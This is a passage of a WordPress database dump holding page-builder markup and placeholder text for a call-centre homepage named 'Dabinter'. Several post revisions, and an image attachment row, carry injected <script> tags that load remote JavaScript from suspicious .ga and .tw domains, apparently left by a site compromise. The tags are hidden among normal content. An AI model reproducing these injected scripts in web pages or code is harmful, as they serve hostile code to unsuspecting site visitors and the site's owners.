animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 00:50:27','2018-01-30 00:50:27','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6678,1,'2018-01-30 00:53:48','2018-01-30 00:53:48','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','bg-banner','','inherit','open','closed','','bg-banner','','','2018-01-30 00:53:48','2018-01-30 00:53:48','',5,'https://sandbox.futuremediatrix.com/dabinter/wp-content/uploads/2018/01/bg-banner.jpg',0,'attachment','image/jpeg',0),(6679,1,'2018-01-30 00:54:00','2018-01-30 00:54:00','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"left top\" bg_repeat=\"no-repeat\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 00:54:00','2018-01-30 00:54:00','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6680,1,'2018-01-30 00:54:27','2018-01-30 00:54:27','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"bottom\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" 